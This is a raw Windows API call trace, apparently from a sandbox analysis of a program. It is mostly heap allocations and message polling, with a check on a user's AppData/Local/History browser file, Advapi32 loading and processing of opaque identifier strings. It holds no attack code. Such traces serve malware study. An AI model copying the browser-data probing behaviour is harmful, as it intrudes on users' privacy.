[0242.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0242.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0242.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0242.694] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0242.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0242.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0242.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0242.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0242.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0242.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.696] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/History", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29175f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29175f80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29175f80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x8c25, cFileName="History", cAlternateFileName="")) returned 0xaa5960 [0242.696] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0242.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0242.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0242.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.699] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0242.699] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0242.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0242.699] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0242.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0242.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0242.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0242.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.700] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0242.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0242.700] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0242.701] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0242.701] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0242.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0242.701] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0242.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.702] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0242.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0242.702] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0242.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0242.702] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0242.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0242.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0242.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0242.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0242.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0242.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0242.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.704] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.704] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0242.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.709] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.709] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.709] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0242.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.709] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0242.709] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0242.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.710] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0242.710] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0242.710] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.711] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0242.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.712] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0242.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0242.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0242.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 